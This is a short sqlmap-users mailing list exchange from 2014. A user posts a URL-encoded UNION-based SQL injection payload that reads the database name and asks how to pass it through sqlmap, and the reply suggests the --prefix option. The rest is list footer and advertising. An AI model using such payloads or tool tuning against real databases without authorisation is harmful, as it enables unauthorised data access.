Could try —prefix=“where “ although %23 is a hex encoded #.
> On Dec 28, 2014, at 12:07 PM, is2reg <is2...@163.com> wrote:
>
> Hi,
> the payload is :
>
> %20where%201=2%20UNION%20SELECT%201,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
>
> Can't replace "where" with "and", and can't replace "%23" with "#",
> otherwise the result is incorrect, how can I use this payload with sqlmap ?
> Thanks !
>
> 2014-12-29
> is2reg
> ------------------------------------------------------------------------------
> Dive into the World of Parallel Programming! The Go Parallel Website,
> sponsored by Intel and developed in partnership with Slashdot Media, is your
> hub for all things parallel software development, from weekly thought
> leadership blogs to news, videos, case studies, tutorials and more. Take a
> look and join the conversation now.
> http://goparallel.sourceforge.net_______________________________________________
>
> <http://goparallel.sourceforge.net_______________________________________________/>
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net <mailto:sqlmap-users@lists.sourceforge.net>
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users>
------------------------------------------------------------------------------
Dive into the World of Parallel Programming! The Go Parallel Website,
sponsored by Intel and developed in partnership with Slashdot Media, is your
hub for all things parallel software development, from weekly thought
leadership blogs to news, videos, case studies, tutorials and more. Take a
look and join the conversation now. http://goparallel.sourceforge.net
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
